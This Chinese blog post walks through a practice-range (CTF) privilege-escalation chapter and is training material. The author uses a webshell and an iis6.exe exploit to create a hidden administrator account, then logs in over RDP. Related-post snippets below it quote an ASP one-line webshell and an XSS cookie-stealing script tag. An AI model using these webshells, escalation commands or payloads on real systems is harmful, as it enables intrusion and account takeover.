封神台 第五章:SYSTEM!POWER!(webshell控制目标 )

最新推荐文章于 2024-03-03 20:36:11 发布
最新推荐文章于 2024-03-03 20:36:11 发布
阅读量1.3k 收藏 9
点赞数 1
分类专栏: 封神台靶场 文章标签: 服务器 windows web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/127414291
版权

一、进入传送门 发现和上题开始一样 

  1.我们使用菜刀(蚁剑搞终端一直失败,不知道为啥,可能是我太捞了...)和蚁剑效果一样

webshell:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。

2.上传

地址是带木马的url,a是我们一句话木马里面引用的内容,脚本类型ASP,字符编码GB2312

连接成功

3. 打开c盘下的flag.txt,不出意外的话,肯定没有权限......

没有权限的话,我们能够想到命令行cmd,是个提权的好方法,返回菜刀目录,右键打开虚拟终端,看看我是谁 whoami 很遗憾拒绝访问....

所以我们还要回文件中找到有用的信息

5.我们打开D盘目录RECYCLER文件夹

recycler(根文件)是windows系列操作系统所用的文件夹,其主要用途是放置被用户删除的文件。

这是我们看到有cmd.exe iis6.exe ,他居然红了,我们想想,什么是红色的,没错,是病毒!!!

 

 如果打开文件没有cmd.exe iis6.exe ,这两个都在d盘05这个文件夹里面。

 我们只能下载文件,不能复制粘贴,还是没有权限,下载的时候把杀毒软件一关,火绒什么的。

 

 下载完成上传就可以了

 

6.从根文件夹进入终端cmd

进入终端

 

查看whoami,我们还是普通用户,

 7.提权

这时要cd .. 到上一层根目录用iis6.exe 来查看权限,找到权限用户为System

iis6.exe "whoami"

使用其创建账户:a 密码:1

net user a 1 /add

 创建成功以后对账号提权至Administrator组

iis6.exe "net localgroup Administrators a /add"

 

 查看新建账号:a 的权限,成功获得最高权限

iis6.exe "net user a"

我们接下来要做的就是远程连接

用tasklist -svc命令查看了这台服务器开启的服务,发现远程桌面服务Termservice的pid是2408

在使用netstat -ano查看端口和连接状态,显示pid=2408所对应的端口号是3389,状态是正在监听,是打开着的,也就是说远程桌面服务的端口号是3389。

 

8.远程连接

题目的ip地址+prot端口连接其服务器

 

打开脑子---C盘----flag 

 

 

最后打开任务管理器,以注销的方式离开。不然下一个小伙伴进去的时候可能会显示终端服务超过连接值。

flag = zkz{F3ck_power_3y3stem}

第五章SYSTEMPOWER
m0_51195235的博客
02-06 365
第五章SYSTEMPOWER
封神台靶场-第五章
Mr_helloword的博客
07-11 1997
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
第五章SYSTEMPOWER
m0_48294281的博客
01-05 1183
靶场学习心得,欢迎交流!
封神台----尤里的复仇I-第六章:SYSTEMPOWER
正在学习的路上...
07-19 1609
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
封神台----尤里的复仇I-第五章:进击!拿到Web最高权限!
正在学习的路上...
07-18 2050
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
CTF挑战:SYSTEMPOWER!提权与账户创建攻略
"这篇内容是关于一场网络安全竞赛CTF(Capture The Flag)的解题攻略,题目编号6,名为'SYSTEMPOWER!'。解答者通过远程操作目标服务器,逐步提升权限并创建新用户,最终完成任务。" 在这个CTF挑战中,参赛者需要...
第01篇:MySQL注入点写WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
虚拟主机封杀webshell提权!!!!!!!!!!
10-01
### 虚拟主机安全加固:封杀WebShell与提权威胁 在当前网络环境中,虚拟主机的安全性显得尤为重要。本文将围绕“虚拟主机封杀WebShell提权”这一主题展开,详细介绍如何在Windows虚拟主机环境下,特别是针对ASP + ...
封神台-第5章 绕过防护上传木马
ploto_cs的博客
09-27 781
封神台-第5章 绕过防护上传木马 1.登录后台 获得了管理员的cookie后,去掉里面的flag部分,取出两个有效的键值对,把他们加到登录的cookie里就行了 键值对为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在这个页面按F12 进入存储界面,更改name和value字段 将ADMINSESSIONIDCSTRCSDQ粘贴在Name下 将LBMLMBCCNPFINOANFGLPCFBC粘贴在value 修改成功后刷新点击“准备好了吗” 进入以下页
封神台第五章提权
ma963852的博客
03-31 4527
首先拿到webshell,终端拒绝访问。 重新上传cmd.exe文件至服务器。 右击-虚拟终端 新建一个用户试试还是拒绝访问 因为使用cmd需要用到外部接口wscript.shell。但是wscript.shell仍然在C盘,C盘我们仍然无法访问。这可怎么办?那么就只能再上传一个已经组装好的wscript.shell 上传完成切换到此路径 通过iis6.exe执行命令 接着创建新用户 命令执行成功,查看新建用户 用户为users组成员,将其添加至管理员...
mbp 封神台靶场 五 (笔记)
qq_43558415的博客
02-09 946
打开链接,发现需要使用上一关的cookie,删除flag并复制放入modheader中即可。 或者用burp抓包替换cookie都可以,登录进去显示管理系统界面。 看了题目的提示,需要上传脚本上去,搞到它的后台。点开各个页面,发现里面有可以上传的地方。 便准备写一个一句话木马上传试一试,新建一个1.txt文件,输入<% eval request('mac') %>即可,并将后缀名改为1...
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1240
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
webshell控制目标:对服务器进行提权以访问远程服务器
Zeker62的博客
08-03 982
什么是提权 提权是提取/提高权限的意思 一般作为访问者,权限比较低,需要提高权限进一步操作。 最想拥有的是管理员的权限。 提权原理: 访问服务器的时候,直接访问一般权限很低。 这个时候我们可以通过一些权限比较高的软件/用户/进程等来操作我们的账户,让我们账户的权限提高。 EXP和POC exp:是指漏洞可以利用代码,运行后直接利用相应的漏洞 poc:是指漏洞可以验证代码,检测是否存在漏洞。 提权过程 靶场:封神台:https://hack.zkaq.cn/battle/target?id=3eb7bec
封神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 5239
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
Windows驱动编程基础(下)之电源管理
zhaopeng01zp的博客
04-27 3095
Windows驱动编程基础(下)第五章 电源管理电源管理概况电源状态的上升和下降 第五章 电源管理 电源管理概况 SystemPowerState系统电源状态到DevicePowerState设备电源状态的转换: 假设我们的设备当前处于工作状态,操作系统的电源管理器PM想把我们的设备置为休眠状态,这个时候PM会发IRP_MN_QUERY_POWER这么一个IRP发给我们的驱动,这个IRP带的消息是把设备的电源用电量降低: 这个IRP的输入参数是IO_STACK_LOCATION中的Parameters
封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】
feiniaotjx的博客
10-20 1万+
靶场练习 封神台-掌控安全在线演练靶场 第一章:为了女神小芳!
封神台-爆破(考点:爆破、MD5编码)
CTF
03-03 434
打开容器后发现就是一段PHP代码,先分析代码的意思,大概就是传入一个token参数,参数的MD5值的第2位,15位和第18位相等才能输出flag的值,直接编写脚本输出符合条件的token值。拿到flag的值。
封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
[深入理解Android卷二 全文-第五章]深入理解PowerManagerService
Innost的专栏
08-03 2万+
由于《深入理解Android 卷一》和《深入理解Android卷二》不再出版,而知识的传播不应该因为纸质媒介的问题而中断,所以我将在CSDN博客中全文转发这两本书的全部内容第5章  深入理解PowerManagerService本章主要内容:·  深入分析PowerManagerService·  深入分析BatteryService和BatteryStatsService本章所涉及的源代码文件名
封神台system
最新发布
03-25
### 封神台 SYSTEM 权限获取与相关操作 封神台是一个虚拟化渗透测试靶场,旨在帮助安全研究人员和爱好者提升技能水平。以下是关于如何在封神台中实现 `SYSTEM` 权限的具体过程及相关知识点。 #### 获取 `SYSTEM` 权限的过程 在一个典型的场景下,可以通过以下方式获得目标系统的最高权限: 1. **利用漏洞提权** 如果存在已知的安全漏洞(如 SQL 注入),可以借助这些漏洞执行恶意代码并进一步提升权限[^3]。例如,在某些情况下,攻击者可能通过 WebShell 控制服务器,并尝试寻找本地提权的机会。 2. **使用 exploit 工具** 当发现特定版本的操作系统或软件存在的零日漏洞时,可以直接应用对应的 exploit 脚本来完成提权动作。比如输入命令 `iis6.exe "whoami"` 可验证当前运行身份是否已经切换至 System 用户级别[^2]。 3. **创建新账户加入 Administrators 组** 提升后的下一步通常是新建一个具有完全管理能力的新账号以便后续维护访问需求。此步骤通常涉及 PowerShell 或 CMD 下面的一些指令来新增成员以及将其纳入高级别群组之中。 4. **确认 RDP (Remote Desktop Protocol)** 接下来要做的便是查找远程桌面协议所使用的具体端口号,默认应该是 3389 。这一步骤可通过组合运用 `netstat -ano | findstr :<port>` 和任务列表中的 PID 对应关系得出结论[^5]。 #### 实际案例解析 以第五章为例,“SYSTEM POWER!”章节重点讲述了 webshell 的部署及其带来的潜在危害。其中提到过利用 tasklist 命令配合参数 `-svc` 审查服务进程详情表单里有关 Termservice 的记录编号即为 2408 ,从而间接推测出关联网络接口监听地址可能是标准设定下的 3389 端口。 另外值得注意的是第四则参考资料还提及到了一种基于主机名结构拆解的技术手段用于辅助定位内部 IP 地址范围内的其它活动站点链接信息[^4]。 ```bash # 示例代码片段展示如何查询指定条件下的所有连接状况 netstat -ano | findstr ":3389" ``` --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值